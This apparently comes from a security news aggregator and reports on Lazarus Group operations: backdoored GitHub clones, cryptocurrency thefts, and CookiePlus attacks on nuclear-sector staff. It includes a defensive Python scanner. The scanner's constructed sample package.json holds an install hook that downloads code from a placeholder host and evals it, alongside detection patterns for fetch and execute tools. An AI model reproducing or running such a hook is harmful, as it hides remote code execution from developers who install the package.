This hidden framework is part of a supply chain attack named "Operation Phantom Circuit", in which the Lazarus Group targets cryptocurrency entities and software developers by planting backdoors in copies of legitimate open-source projects. Developers are lured into cloning and running these backdoored GitHub repositories, and the embedded code then connects to the group's C2 infrastructure. This approach lets the group infiltrate companies around the world and exfiltrate sensitive data back to Pyongyang. The operation claimed over 233 victims, mostly in the cryptocurrency industry, between September 2024 and January 2025; it is linked to North Korea through the use of Astrill VPNs and six distinct North Korean IP addresses.
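The practical defence against a backdoored clone is to look before running it. The Python script below is an added example written for this page (not tooling from the researchers, and not based on indicators from the Phantom Circuit report) showing two checks a developer can apply to a freshly cloned JavaScript project before `npm install`: npm lifecycle hooks that fetch or execute code at install time, and source files that decode an encoded blob and hand it straight to dynamic execution. The sample repository, the package name and the address 198.51.100.7 (TEST-NET-2 documentation range) are constructed; the heuristics are the editor's, not a published detection rule.

```python
"""Pre-run triage of a cloned JavaScript project for planted backdoors.

Added example, not research tooling. Heuristics: npm lifecycle hooks that
fetch or execute code at install time, and source files that decode a blob
and immediately execute it. The sample repository is constructed; the
address 198.51.100.7 is from the TEST-NET-2 documentation range.
"""
import json
import re

# Lifecycle scripts npm runs automatically on `npm install` of a checkout.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

REMOTE_FETCH_RE = re.compile(
    r"""(\bcurl\b|\bwget\b|Invoke-WebRequest|Invoke-RestMethod|require\(['"]https?['"]\)|\bfetch\()""", re.I)
DYNAMIC_EXEC_RE = re.compile(r"\b(eval|new Function|child_process|execSync|spawn)\b")
DECODE_RE = re.compile(r"""Buffer\.from\([^)]*,\s*['"](base64|hex)['"]\)|\batob\(""")

# Constructed sample repository as path -> contents so the example runs offline.
SAMPLE_REPO = {
    "package.json": json.dumps({
        "name": "wallet-helper",
        "version": "1.0.0",
        "scripts": {
            "postinstall": "node -e \"require('https').get('https://198.51.100.7/x',r=>{let d='';r.on('data',c=>d+=c);r.on('end',()=>eval(d))})\"",
            "test": "jest",
        },
    }),
    "src/index.js": "const fs = require('fs');\nmodule.exports = () => fs.readFileSync('config.json');\n",
    "src/util.js": "const p = Buffer.from('Y29uc29sZS5sb2coJ2hpJyk=', 'base64').toString();\nnew Function(p)();\n",
}


def scan_package_json(text):
    """Flag lifecycle hooks that reach the network or execute dynamic code."""
    findings = []
    try:
        pkg = json.loads(text)
    except json.JSONDecodeError:
        return [("package.json", "unparseable")]
    for hook, cmd in pkg.get("scripts", {}).items():
        if hook not in LIFECYCLE_HOOKS:
            continue
        reasons = []
        if REMOTE_FETCH_RE.search(cmd):
            reasons.append("remote fetch")
        if DYNAMIC_EXEC_RE.search(cmd):
            reasons.append("dynamic execution")
        if reasons:
            findings.append((f"package.json:{hook}", ", ".join(reasons)))
    return findings


def scan_source(path, text):
    """Flag a file that both decodes a blob and executes code dynamically."""
    decodes = DECODE_RE.search(text) is not None
    executes = DYNAMIC_EXEC_RE.search(text) is not None
    if decodes and executes:
        return [(path, "decoded blob passed to dynamic execution")]
    return []


def scan_repo(files):
    """files: mapping of relative path -> contents. Returns a (location, reason) list."""
    findings = []
    for path, text in sorted(files.items()):
        if path.endswith("package.json"):
            findings.extend(scan_package_json(text))
        elif path.endswith((".js", ".mjs", ".cjs", ".ts")):
            findings.extend(scan_source(path, text))
    return findings


if __name__ == "__main__":
    for loc, why in scan_repo(SAMPLE_REPO):
        print(f"{loc}: {why}")
```

The decode-plus-execute rule is deliberately conjunctive: `eval` on its own appears in plenty of legitimate code, while a base64 literal that is decoded and then executed in the same file is almost always hiding something. A real pre-install check would also run `npm install --ignore-scripts` first and inspect what the dependencies' own hooks would do, since the planted code need not live in the repository's top-level package.json.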

Recommended read:
References :
  • ciso2ciso.com: The ongoing investigation into recent attacks by the Lazarus Group on cryptocurrency entities and software developers.
  • The Hacker News: The Lazarus Group uses React application for C2 control.
  • go.theregister.com: North Koreans clone open source projects to plant backdoors, steal credentials
  • gbhackers.com: Reporting on the Lazarus Group's targeting of developers through malicious NPM packages

@securityonline.info - 47d
The United States, Japan, and South Korea have jointly issued a warning to the blockchain industry regarding escalating cyber threats from state-sponsored North Korean hackers. These attacks are not limited to the three nations but extend to the broader international community, with a specific focus on stealing cryptocurrencies from exchanges, custodians, and individual users. The hackers' activities, attributed to groups such as the Lazarus Group, are aimed at generating illicit revenue for the North Korean government's weapons programs.

The scale of these cyber heists is significant, with over $650 million stolen in 2024 alone. Major losses include $308 million from DMM Bitcoin, $50 million from Upbit, and $16.1 million from Rain Management. The 2024 attacks on WazirX ($235 million) and Radiant Capital ($50 million) have also been attributed to North Korean cyber actors. The tactics are becoming increasingly advanced, centred on social engineering that delivers malware families such as TraderTraitor and AppleJeus. The joint statement underscores the need for stronger cybersecurity measures and international cooperation to prevent further financial losses.

Recommended read:
References :
  • Cybernews: State-sponsored North Korean hackers threaten not only the US, Japan, and South Korea but also the broader international community.
  • securityonline.info: Millions Stolen: North Korea Hackers Target Blockchain Industry
  • Crypto Briefing: US, Japan, and South Korea warn blockchain industry of North Korea’s ongoing cyber threats

CISO2CISO Editor 2@ciso2ciso.com - 69d
The Lazarus Group, a hacking collective with ties to North Korea, is intensifying its cyber operations against the nuclear industry, employing new malware and tactics. Recent attacks targeted employees of 'nuclear-related' organizations with archives posing as job assessment tests, delivered as ISO and ZIP files. The archives contained a trojanized virtual network computing (VNC) utility: a modified AmazonVNC.exe bundled with legitimate UltraVNC components, so the malicious code runs alongside genuine software. This gives the group a layered infection chain that helps it evade detection.

These intrusions use complex infection chains and modular malware made up of downloaders, loaders and backdoors. Among the components are 'CookieTime', which can download further payloads, and 'CookiePlus', disguised as a Notepad++ plugin, which fetches additional plugins and decrypts them before use. The group's motivation is believed to be both financial gain and espionage. The ongoing attacks highlight the evolving threat that state-sponsored actors pose to sensitive industries and organizations.

Recommended read:
References :
  • cyberinsider.com: North Korean Hackers ‘Lazarus’ Target Nuclear Orgs with New Malware
  • osint10x.com: North Korean hackers spotted using new tools on employees of 'nuclear-related' org
  • CyberInsider: The notorious Lazarus Group has evolved its infection tactics, employing both updated and novel malware like ‘CookiePlus' to infiltrate targets in defense, aerospace, cryptocurrency, and nuclear industries.
  • ciso2ciso.com: Lazarus APT targeted employees at an unnamed nuclear-related organization
  • securityaffairs.com: Lazarus APT targeted employees at an unnamed nuclear-related organization
  • www.cybersecurity-insiders.com: Lazarus launches malware on Nuclear power org and Kaspersky Telegram Phishing scams
  • ciso2ciso.com: Lazarus Group Targets Nuclear Industry with CookiePlus Malware – Source:hackread.com